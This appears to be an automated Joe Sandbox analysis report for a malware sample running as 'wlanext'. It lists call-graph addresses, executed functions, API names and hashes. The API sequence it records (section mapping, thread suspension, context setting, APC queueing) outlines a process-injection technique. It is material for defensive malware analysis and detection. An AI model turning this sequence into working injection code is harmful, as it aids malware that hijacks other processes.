112213->112319 112216 bc4c7a 112214->112216 112217 bc4c66 112214->112217 112220 bc4c7f 112216->112220 112221 bc4c97 112216->112221 112318 bc4650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 112217->112318 112263 bc46f0 112220->112263 112221->112208 112275 bc4410 112221->112275 112223 bc4c70 112223->112164 112225 bc4c8d 112225->112164 112227 bc4d2c 112323 bca490 112227->112323 112228 bc4caf 112228->112164 112230 bc4d38 112230->112164 112232 bcb101 112231->112232 112233 bcb113 112232->112233 112345 bcbd40 112232->112345 112233->112167 112235 bcb134 112348 bc4070 112235->112348 112237 bcb180 112237->112167 112238 bcb157 112238->112237 112239 bc4070 3 API calls 112238->112239 112241 bcb179 112239->112241 112241->112237 112380 bc5390 112241->112380 112242 bcb20a 112243 bcb21a 112242->112243 112474 bcaf00 LdrLoadDll 112242->112474 112390 bcad70 112243->112390 112246 bcb248 112469 bc9ec0 112246->112469 112250 bc9f1c 112249->112250 112251 bcaf60 LdrLoadDll 112249->112251 112502 3632c0a 112250->112502 112251->112250 112252 bc9f37 112254 bcbdc0 112252->112254 112255 bcb359 112254->112255 112505 bca670 112254->112505 112255->112130 112258 bcaf60 LdrLoadDll 112257->112258 112259 bc4b44 112258->112259 112259->112196 112259->112197 112259->112198 112261 bcaf60 LdrLoadDll 112260->112261 112262 bca37c NtCreateFile 112261->112262 112262->112201 112264 bc470c 112263->112264 112265 bca2e0 LdrLoadDll 112264->112265 112266 bc472d 112265->112266 112267 bc4748 112266->112267 112268 bc4734 112266->112268 112270 bca490 2 API calls 112267->112270 112269 bca490 2 API calls 112268->112269 112271 bc473d 112269->112271 112272 bc4751 112270->112272 112271->112225 112327 bcbfd0 LdrLoadDll RtlAllocateHeap 112272->112327 112274 bc475c 112274->112225 112276 bc448e 112275->112276 112277 bc445b 112275->112277 112279 bc45d9 112276->112279 112283 bc44aa 112276->112283 112278 bca2e0 LdrLoadDll 112277->112278 112280 bc4476 112278->112280 112281 bca2e0 LdrLoadDll 112279->112281 112282 bca490 2 API calls 112280->112282 112286 bc45f4 112281->112286 112284 bc447f 112282->112284 112285 bca2e0 LdrLoadDll 112283->112285 112284->112228 112287 bc44c5 112285->112287 112341 bca320 LdrLoadDll 112286->112341 112289 bc44cc 112287->112289 112290 bc44e1 112287->112290 112294 bca490 2 API calls 112289->112294 112291 bc44fc 112290->112291 112292 bc44e6 112290->112292 112303 bc4501 112291->112303 112328 bcbf90 112291->112328 112296 bca490 2 API calls 112292->112296 112293 bc462e 112297 bca490 2 API calls 112293->112297 112295 bc44d5 112294->112295 112295->112228 112299 bc44ef 112296->112299 112298 bc4639 112297->112298 112298->112228 112299->112228 112302 bc4567 112304 bc457e 112302->112304 112340 bca2a0 LdrLoadDll 112302->112340 112310 bc4513 112303->112310 112332 bca410 112303->112332 112306 bc459a 112304->112306 112307 bc4585 112304->112307 112309 bca490 2 API calls 112306->112309 112308 bca490 2 API calls 112307->112308 112308->112310 112311 bc45a3 112309->112311 112310->112228 112312 bc45cf 112311->112312 112335 bcbb90 112311->112335 112312->112228 112314 bc45ba 112315 bcbdc0 2 API calls 112314->112315 112316 bc45c3 112315->112316 112316->112228 112317->112196 112318->112223 112320 bcaf60 LdrLoadDll 112319->112320 112321 bc4d14 112320->112321 112322 bca320 LdrLoadDll 112321->112322 112322->112227 112324 bcaf60 LdrLoadDll 112323->112324 112325 bca4ac NtClose 112324->112325 112325->112230 112326->112210 112327->112274 112329 bcbfa3 112328->112329 112342 bca630 112329->112342 112331 bcbfa8 112331->112303 112333 bcaf60 LdrLoadDll 112332->112333 112334 bca42c NtReadFile 112333->112334 112334->112302 112336 bcbb9d 112335->112336 112337 bcbbb4 112335->112337 112336->112337 112338 bcbf90 2 API calls 112336->112338 112337->112314 112339 bcbbcb 112338->112339 112339->112314 112340->112304 112341->112293 112343 bcaf60 LdrLoadDll 112342->112343 112344 bca64c RtlAllocateHeap 112343->112344 112344->112331 112475 bca540 112345->112475 112347 bcbd6d 112347->112235 112349 bc4081 112348->112349 112350 bc4089 112348->112350 112349->112238 112351 bc435c 112350->112351 112478 bccf30 112350->112478 112351->112238 112353 bc40dd 112354 bccf30 2 API calls 112353->112354 112357 bc40e8 112354->112357 112355 bc4136 112358 bccf30 2 API calls 112355->112358 112357->112355 112359 bcd060 3 API calls 112357->112359 112489 bccfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 112357->112489 112361 bc414a 112358->112361 112359->112357 112360 bc41a7 112362 bccf30 2 API calls 112360->112362 112361->112360 112483 bcd060 112361->112483 112363 bc41bd 112362->112363 112365 bc41fa 112363->112365 112367 bcd060 3 API calls 112363->112367 112366 bccf30 2 API calls 112365->112366 112368 bc4205 112366->112368 112367->112363 112369 bcd060 3 API calls 112368->112369 112376 bc423f 112368->112376 112369->112368 112371 bc4334 112491 bccf90 LdrLoadDll RtlFreeHeap 112371->112491 112373 bc433e 112492 bccf90 LdrLoadDll RtlFreeHeap 112373->112492 112375 bc4348 112493 bccf90 LdrLoadDll RtlFreeHeap 112375->112493 112490 bccf90 LdrLoadDll RtlFreeHeap 112376->112490 112378 bc4352 112494 bccf90 LdrLoadDll RtlFreeHeap 112378->112494 112381 bc53a1 112380->112381 112382 bc4a50 8 API calls 112381->112382 112384 bc53b7 112382->112384 112383 bc540a 112383->112242 112384->112383 112385 bc5405 112384->112385 112386 bc53f2 112384->112386 112388 bcbdc0 2 API calls 112385->112388 112387 bcbdc0 2 API calls 112386->112387 112389 bc53f7 112387->112389 112388->112383 112389->112242 112495 bcac30 112390->112495 112393 bcac30 LdrLoadDll 112394 bcad8d 112393->112394 112395 bcac30 LdrLoadDll 112394->112395 112396 bcad96 112395->112396 112397 bcac30 LdrLoadDll 112396->112397 112398 bcad9f 112397->112398 112399 bcac30 LdrLoadDll 112398->112399 112400 bcada8 112399->112400 112401 bcac30 LdrLoadDll 112400->112401 112402 bcadb1 112401->112402 112403 bcac30 LdrLoadDll 112402->112403 112404 bcadbd 112403->112404 112405 bcac30 LdrLoadDll 112404->112405 112406 bcadc6 112405->112406 112407 bcac30 LdrLoadDll 112406->112407 112408 bcadcf 112407->112408 112409 bcac30 LdrLoadDll 112408->112409 112410 bcadd8 112409->112410 112411 bcac30 LdrLoadDll 112410->112411 112412 bcade1 112411->112412 112413 bcac30 LdrLoadDll 112412->112413 112414 bcadea 112413->112414 112415 bcac30 LdrLoadDll 112414->112415 112416 bcadf6 112415->112416 112417 bcac30 LdrLoadDll 112416->112417 112418 bcadff 112417->112418 112419 bcac30 LdrLoadDll 112418->112419 112420 bcae08 112419->112420 112421 bcac30 LdrLoadDll 112420->112421 112422 bcae11 112421->112422 112423 bcac30 LdrLoadDll 112422->112423 112424 bcae1a 112423->112424 112425 bcac30 LdrLoadDll 112424->112425 112426 bcae23 112425->112426 112427 bcac30 LdrLoadDll 112426->112427 112428 bcae2f 112427->112428 112429 bcac30 LdrLoadDll 112428->112429 112430 bcae38 112429->112430 112431 bcac30 LdrLoadDll 112430->112431 112432 bcae41 112431->112432 112433 bcac30 LdrLoadDll 112432->112433 112434 bcae4a 112433->112434 112435 bcac30 LdrLoadDll 112434->112435 112436 bcae53 112435->112436 112437 bcac30 LdrLoadDll 112436->112437 112438 bcae5c 112437->112438 112439 bcac30 LdrLoadDll 112438->112439 112440 bcae68 112439->112440 112441 bcac30 LdrLoadDll 112440->112441 112442 bcae71 112441->112442 112443 bcac30 LdrLoadDll 112442->112443 112444 bcae7a 112443->112444 112445 bcac30 LdrLoadDll 112444->112445 112446 bcae83 112445->112446 112447 bcac30 LdrLoadDll 112446->112447 112448 bcae8c 112447->112448 112449 bcac30 LdrLoadDll 112448->112449 112450 bcae95 112449->112450 112451 bcac30 LdrLoadDll 112450->112451 112452 bcaea1 112451->112452 112453 bcac30 LdrLoadDll 112452->112453 112454 bcaeaa 112453->112454 112455 bcac30 LdrLoadDll 112454->112455 112456 bcaeb3 112455->112456 112457 bcac30 LdrLoadDll 112456->112457 112458 bcaebc 112457->112458 112459 bcac30 LdrLoadDll 112458->112459 112460 bcaec5 112459->112460 112461 bcac30 LdrLoadDll 112460->112461 112462 bcaece 112461->112462 112463 bcac30 LdrLoadDll 112462->112463 112464 bcaeda 112463->112464 112465 bcac30 LdrLoadDll 112464->112465 112466 bcaee3 112465->112466 112467 bcac30 LdrLoadDll 112466->112467 112468 bcaeec 112467->112468 112468->112246 112470 bcaf60 LdrLoadDll 112469->112470 112471 bc9edc 112470->112471 112501 3632df0 LdrInitializeThunk 112471->112501 112472 bc9ef3 112472->112167 112474->112243 112476 bca55c NtAllocateVirtualMemory 112475->112476 112477 bcaf60 LdrLoadDll 112475->112477 112476->112347 112477->112476 112479 bccf46 112478->112479 112480 bccf40 112478->112480 112481 bcbf90 2 API calls 112479->112481 112480->112353 112482 bccf6c 112481->112482 112482->112353 112484 bccfd0 112483->112484 112485 bcbf90 2 API calls 112484->112485 112488 bcd02d 112484->112488 112486 bcd00a 112485->112486 112487 bcbdc0 2 API calls 112486->112487 112487->112488 112488->112361 112489->112357 112490->112371 112491->112373 112492->112375 112493->112378 112494->112351 112496 bcac4b 112495->112496 112497 bc4e50 LdrLoadDll 112496->112497 112498 bcac6b 112497->112498 112499 bc4e50 LdrLoadDll 112498->112499 112500 bcad17 112498->112500 112499->112500 112500->112393 112501->112472 112503 3632c11 112502->112503 112504 3632c1f LdrInitializeThunk 112502->112504 112503->112252 112504->112252 112506 bcaf60 LdrLoadDll 112505->112506 112507 bca68c RtlFreeHeap 112506->112507 112507->112255 112509 bb7eab 112508->112509 112510 bb7eb0 112508->112510 112509->112175 112511 bcbd40 2 API calls 112510->112511 112514 bb7ed5 112511->112514 112512 bb7f38 112512->112175 112513 bc9ec0 2 API calls 112513->112514 112514->112512 112514->112513 112515 bb7f3e 112514->112515 112519 bcbd40 2 API calls 112514->112519 112524 bca5c0 112514->112524 112517 bb7f64 112515->112517 112518 bca5c0 2 API calls 112515->112518 112517->112175 112520 bb7f55 112518->112520 112519->112514 112520->112175 112522 bca5c0 2 API calls 112521->112522 112523 bb817e 112522->112523 112523->112132 112525 bca5dc 112524->112525 112526 bcaf60 LdrLoadDll 112524->112526 112529 3632c70 LdrInitializeThunk 112525->112529 112526->112525 112527 bca5f3 112527->112514 112529->112527 112531 bcb5c3 112530->112531 112534 bbacf0 112531->112534 112535 bbad14 112534->112535 112536 bbad50 LdrLoadDll 112535->112536 112537 bb9c4a 112535->112537 112536->112537 112537->112138 112540 bbb063 112538->112540 112539 bbb0e0 112539->112145 112540->112539 112553 bc9c90 LdrLoadDll 112540->112553 112543 bcaf60 LdrLoadDll 112542->112543 112544 bbf1bb 112543->112544 112544->112153 112545 bca7d0 112544->112545 112546 bcaf60 LdrLoadDll 112545->112546 112547 bca7ef LookupPrivilegeValueW 112546->112547 112547->112149 112549 bcaf60 LdrLoadDll 112548->112549 112550 bca27c 112549->112550 112554 3632ea0 LdrInitializeThunk 112550->112554 112551 bca29b 112551->112150 112553->112539 112554->112551 112556 bbb1f0 112555->112556 112557 bbb040 LdrLoadDll 112556->112557 112558 bbb204 112557->112558 112558->112085 112560 bbaf34 112559->112560 112632 bc9c90 LdrLoadDll 112560->112632 112562 bbaf6e 112562->112087 112564 bbf3ac 112563->112564 112565 bbb1c0 LdrLoadDll 112564->112565 112566 bbf3be 112565->112566 112633 bbf290 112566->112633 112569 bbf3d9 112571 bbf3e4 112569->112571 112573 bca490 2 API calls 112569->112573 112570 bbf3f1 112572 bbf402 112570->112572 112574 bca490 2 API calls 112570->112574 112571->112091 112572->112091 112573->112571 112574->112572 112576 bbf43c 112575->112576 112652 bbb2b0 112576->112652 112578 bbf44e 112579 bbf290 3 API calls 112578->112579 112580 bbf45f 112579->112580 112581 bbf469 112580->112581 112582 bbf481 112580->112582 112583 bca490 2 API calls 112581->112583 112584 bbf474 112581->112584 112585 bca490 2 API calls 112582->112585 112586 bbf492 112582->112586 112583->112584 112584->112093 112585->112586 112586->112093 112588 bbcaa6 112587->112588 112589 bbcab0 112587->112589 112588->112102 112590 bbaf10 LdrLoadDll 112589->112590 112591 bbcb4e 112590->112591 112592 bbcb74 112591->112592 112593 bbb040 LdrLoadDll 112591->112593 112592->112102 112594 bbcb90 112593->112594 112595 bc4a50 8 API calls 112594->112595 112596 bbcbe5 112595->112596 112596->112102 112598 bbd646 112597->112598 112599 bbb040 LdrLoadDll 112598->112599 112600 bbd65a 112599->112600 112656 bbd310 112600->112656 112602 bb908b 112603 bbcc00 112602->112603 112604 bbcc26 112603->112604 112605 bbb040 LdrLoadDll 112604->112605 112606 bbcca9 112604->112606 112605->112606 112607 bbb040 LdrLoadDll 112606->112607 112608 bbcd16 112607->112608 112609 bbaf10 LdrLoadDll 112608->112609 112610 bbcd7f 112609->112610 112611 bbb040 LdrLoadDll 112610->112611 112612 bbce2f 112611->112612 112612->112115 112616 bb8d14 112613->112616 112685 bbf6d0 112613->112685 112615 bb8f25 112615->112072 112616->112615 112690 bc43a0 112616->112690 112618 bb8d70 112618->112615 112693 bb8ab0 112618->112693 112621 bccf30 2 API calls 112622 bb8db2 112621->112622 112623 bcd060 3 API calls 112622->112623 112627 bb8dc7 112623->112627 112624 bb7ea0 4 API calls 112624->112627 112627->112615 112627->112624 112628 bbc7b0 18 API calls 112627->112628 112629 bb8160 2 API calls 112627->112629 112698 bbf670 112627->112698 112702 bbf080 21 API calls 112627->112702 112628->112627 112629->112627 112630->112095 112631->112112 112632->112562 112634 bbf2aa 112633->112634 112642 bbf360 112633->112642 112635 bbb040 LdrLoadDll 112634->112635 112636 bbf2cc 112635->112636 112643 bc9f40 112636->112643 112638 bbf30e 112646 bc9f80 112638->112646 112641 bca490 2 API calls 112641->112642 112642->112569 112642->112570 112644 bcaf60 LdrLoadDll 112643->112644 112645 bc9f5c 112644->112645 112645->112638 112647 bcaf60 LdrLoadDll 112646->112647 112648 bc9f9c 112647->112648 112649 bbf354 112648->112649 112651 36335c0 LdrInitializeThunk 112648->112651 112649->112641 112651->112649 112653 bbb2d7 112652->112653 112654 bbb040 LdrLoadDll 112653->112654 112655 bbb313 112654->112655 112655->112578 112657 bbd327 112656->112657 112665 bbf710 112657->112665 112661 bbd39b 112662 bbd3a2 112661->112662 112676 bca2a0 LdrLoadDll 112661->112676 112662->112602 112664 bbd3b5 112664->112602 112666 bbf735 112665->112666 112677 bb81a0 112666->112677 112668 bbd36f 112673 bca6e0 112668->112673 112669 bc4a50 8 API calls 112671 bbf759 112669->112671 112671->112668 112671->112669 112672 bcbdc0 2 API calls 112671->112672 112684 bbf550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 112671->112684 112672->112671 112674 bcaf60 LdrLoadDll 112673->112674 112675 bca6ff CreateProcessInternalW 112674->112675 112675->112661 112676->112664 112678 bb829f 112677->112678 112679 bb81b5 112677->112679 112678->112671 112679->112678 112680 bc4a50 8 API calls 112679->112680 112681 bb8222 112680->112681 112682 bcbdc0 2 API calls 112681->112682 112683 bb8249 112681->112683 112682->112683 112683->112671 112684->112671 112686 bc4e50 LdrLoadDll 112685->112686 112687 bbf6ef 112686->112687 112688 bbf6fd 112687->112688 112689 bbf6f6 SetErrorMode 112687->112689 112688->112616 112689->112688 112703 bbf4a0 112690->112703 112692 bc43c6 112692->112618 112694 bcbd40 2 API calls 112693->112694 112697 bb8ad5 112694->112697 112695 bb8cea 112695->112621 112697->112695 112722 bc9880 112697->112722 112699 bbf683 112698->112699 112770 bc9e90 112699->112770 112702->112627 112704 bbf4bd 112703->112704 112710 bc9fc0 112704->112710 112707 bbf505 112707->112692 112711 bcaf60 LdrLoadDll 112710->112711 112712 bc9fdc 112711->112712 112720 3632f30 LdrInitializeThunk 112712->112720 112713 bbf4fe 112713->112707 112715 bca010 112713->112715 112716 bcaf60 LdrLoadDll 112715->112716 112717 bca02c 112716->112717 112721 3632d10 LdrInitializeThunk 112717->112721 112718 bbf52e 112718->112692 112720->112713 112721->112718 112723 bcbf90 2 API calls 112722->112723 112724 bc9897 112723->112724 112743 bb9310 112724->112743 112726 bc98b2 112727 bc98d9 112726->112727 112728 bc98f0 112726->112728 112729 bcbdc0 2 API calls 112727->112729 112730 bcbd40 2 API calls 112728->112730 112731 bc98e6 112729->112731 112732 bc992a 112730->112732 112731->112695 112733 bcbd40 2 API calls 112732->112733 112734 bc9943 112733->112734 112739 bc9be4 112734->112739 112749 bcbd80 LdrLoadDll 112734->112749 112736 bc9bc9 112737 bc9bd0 112736->112737 112736->112739 112738 bcbdc0 2 API calls 112737->112738 112740 bc9bda 112738->112740 112741 bcbdc0 2 API calls 112739->112741 112740->112695 112742 bc9c39 112741->112742 112742->112695 112744 bb9335 112743->112744 112745 bbacf0 LdrLoadDll 112744->112745 112746 bb9368 112745->112746 112748 bb938d 112746->112748 112750 bbcf20 112746->112750 112748->112726 112749->112736 112751 bbcf4c 112750->112751 112752 bca1e0 LdrLoadDll 112751->112752 112753 bbcf65 112752->112753 112754 bbcf6c 112753->112754 112761 bca220 112753->112761 112754->112748 112758 bbcfa7 112759 bca490 2 API calls 112758->112759 112760 bbcfca 112759->112760 112760->112748 112762 bcaf60 LdrLoadDll 112761->112762 112763 bca23c 112762->112763 112769 3632ca0 LdrInitializeThunk 112763->112769 112764 bbcf8f 112764->112754 112766 bca810 112764->112766 112767 bcaf60 LdrLoadDll 112766->112767 112768 bca82f 112767->112768 112768->112758 112769->112764 112771 bcaf60 LdrLoadDll 112770->112771 112772 bc9eac 112771->112772 112775 3632dd0 LdrInitializeThunk 112772->112775 112773 bbf6ae 112773->112627 112775->112773 112779 3632ad0 LdrInitializeThunk 112780 bc9080 112781 bcbd40 2 API calls 112780->112781 112783 bc90bb 112781->112783 112782 bc919c 112783->112782 112784 bbacf0 LdrLoadDll 112783->112784 112785 bc90f1 112784->112785 112786 bc4e50 LdrLoadDll 112785->112786 112788 bc910d 112786->112788 112787 bc9120 Sleep 112787->112788 112788->112782 112788->112787 112791 bc8ca0 LdrLoadDll 112788->112791 112792 bc8eb0 LdrLoadDll 112788->112792 112791->112788 112792->112788 112793 34acb84 112796 34aa042 112793->112796 112795 34acba5 112798 34aa06b 112796->112798 112797 34aa56c 112797->112795 112798->112797 112799 34aa182 NtQueryInformationProcess 112798->112799 112801 34aa1ba 112799->112801 112800 34aa1ef 112800->112795 112801->112800 112802 34aa2db 112801->112802 112803 34aa290 112801->112803 112804 34aa2fc NtSuspendThread 112802->112804 112825 34a9de2 NtCreateSection NtMapViewOfSection NtClose 112803->112825 112806 34aa30d 112804->112806 112808 34aa331 112804->112808 112806->112795 112807 34aa2cf 112807->112795 112810 34aa412 112808->112810 112816 34a9bb2 112808->112816 112811 34aa531 112810->112811 112813 34aa4a6 NtSetContextThread 112810->112813 112812 34aa552 NtResumeThread 112811->112812 112812->112797 112815 34aa4bd 112813->112815 112814 34aa51c RtlQueueApcWow64Thread 112814->112811 112815->112811 112815->112814 112817 34a9bf7 112816->112817 112818 34a9c66 NtCreateSection 112817->112818 112819 34a9d4e 112818->112819 112820 34a9ca0 112818->112820 112819->112810 112821 34a9cc1 NtMapViewOfSection 112820->112821 112821->112819 112822 34a9d0c 112821->112822 112822->112819 112823 34a9d88 112822->112823 112824 34a9dc5 NtClose 112823->112824 112824->112810 112825->112807

                                            Executed Functions

                                            Function 034AA036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • NtQueryInformationProcess.NTDLL ref: 034AA19F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450245257.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_34a0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: 0
                                            • API String ID: 1778838933-4108050209
                                            • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                            • Instruction ID: f93ec44b854da4b565d50fc6efa6858ec79237c83b4feab378a2e281f8302df2
                                            • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                            • Instruction Fuzzy Hash: 12F12174918A8C8FDBA5EF69C894AEEB7E0FFA8304F40462ED44ADB250DF349541CB45
                                            Function 034A9BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 209 34a9baf-34a9bfe call 34a9102 212 34a9c0c-34a9c9a call 34ab942 * 2 NtCreateSection 209->212 213 34a9c00 209->213 219 34a9d5a-34a9d68 212->219 220 34a9ca0-34a9d0a call 34ab942 NtMapViewOfSection 212->220 214 34a9c02-34a9c0a 213->214 214->212 214->214 223 34a9d0c-34a9d4c 220->223 224 34a9d52 220->224 226 34a9d69-34a9d6b 223->226 227 34a9d4e-34a9d4f 223->227 224->219 228 34a9d88-34a9ddc call 34acd62 NtClose 226->228 229 34a9d6d-34a9d72 226->229 227->224 230 34a9d74-34a9d86 call 34a9172 229->230 230->228
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450245257.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_34a0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Section$CloseCreateView
                                            • String ID: @$@
                                            • API String ID: 1133238012-149943524
                                            • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                            • Instruction ID: 31e1db420a5de52d030766b19facbd228732996e16832298c75aa4e11562a0e0
                                            • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                            • Instruction Fuzzy Hash: D8617F70618B4C8FCB58EF6CD8856AABBE0FB98314F50062EE58AC7651DB35D441CB86
                                            Function 034A9BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 268 34a9bb2-34a9bef 269 34a9bf7-34a9bfe 268->269 270 34a9bf2 call 34a9102 268->270 271 34a9c0c-34a9c9a call 34ab942 * 2 NtCreateSection 269->271 272 34a9c00 269->272 270->269 278 34a9d5a-34a9d68 271->278 279 34a9ca0-34a9d0a call 34ab942 NtMapViewOfSection 271->279 273 34a9c02-34a9c0a 272->273 273->271 273->273 282 34a9d0c-34a9d4c 279->282 283 34a9d52 279->283 285 34a9d69-34a9d6b 282->285 286 34a9d4e-34a9d4f 282->286 283->278 287 34a9d88-34a9ddc call 34acd62 NtClose 285->287 288 34a9d6d-34a9d72 285->288 286->283 289 34a9d74-34a9d86 call 34a9172 288->289 289->287
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450245257.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_34a0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Section$CreateView
                                            • String ID: @$@
                                            • API String ID: 1585966358-149943524
                                            • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                            • Instruction ID: ac8bd4e15d7024d23a70f1730dfe002e6fbb0706cdfa46561c8f82cee9d190f9
                                            • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                            • Instruction Fuzzy Hash: 75517E70618B088FD758DF1CD8956AABBE0FB98314F50062EE98AC3651DF35D481CB86
                                            Function 034AA042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • NtQueryInformationProcess.NTDLL ref: 034AA19F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450245257.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_34a0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: 0
                                            • API String ID: 1778838933-4108050209
                                            • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                            • Instruction ID: 947609c64611ab86673c02cadeb7b1574e3449755d8f60b7564f738c1b1dd5fc
                                            • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                            • Instruction Fuzzy Hash: 8E514F74918A8C8FDBA5EF68C8946EEB7F4FB98304F40462ED44ADB210DF309645CB45
                                            Function 00BCA360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 547 bca360-bca3b1 call bcaf60 NtCreateFile
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00BC4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00BC4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00BCA3AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: f67a9f3e7b7c95594645118b7aaf02615d0b87216c3a5dd639470f889410e2ba
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: 1EF0BDB2200208ABCB08CF88DC85EEB77EDAF8C754F158248BA0D97241C630E8118BA4
                                            Function 00BCA48C Relevance: 1.5, APIs: 1, Instructions: 42nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00BC4D50,?,?,00BC4D50,00000000,FFFFFFFF), ref: 00BCA4B5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 6290c39005f8f9aee95d04a16c54b3f8ba4d7717db0a7667504d05d0906aa54f
                                            • Instruction ID: 9c1f1fb40f76f9fb9c84949273eceba4b2fea50791b692e3a1c1ea68d2be7f50
                                            • Opcode Fuzzy Hash: 6290c39005f8f9aee95d04a16c54b3f8ba4d7717db0a7667504d05d0906aa54f
                                            • Instruction Fuzzy Hash: 37F03CB5600108ABDB14DF98DC81EEB77A9EF88718F10855DFD09D7201D630E9108BA0
                                            Function 00BCA410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(00BC4D72,5EB65239,FFFFFFFF,00BC4A31,?,?,00BC4D72,?,00BC4A31,FFFFFFFF,5EB65239,00BC4D72,?,00000000), ref: 00BCA455
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: cc4d93888350a2e4d03ffa21d3a8b0eb0068c368c4bd6403379b994409a95af2
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: 78F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158248BA1D97241D630E8118BA0
                                            Function 00BCA40A Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(00BC4D72,5EB65239,FFFFFFFF,00BC4A31,?,?,00BC4D72,?,00BC4A31,FFFFFFFF,5EB65239,00BC4D72,?,00000000), ref: 00BCA455
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 8d8d7ec8d7892973c3fde1f4d1a7ffc79b2694e24f4bfc62399525d62608610b
                                            • Instruction ID: 23555739bb0942b9a3c7622c40917acad11f6bc7afbe3474975d674eedcb955e
                                            • Opcode Fuzzy Hash: 8d8d7ec8d7892973c3fde1f4d1a7ffc79b2694e24f4bfc62399525d62608610b
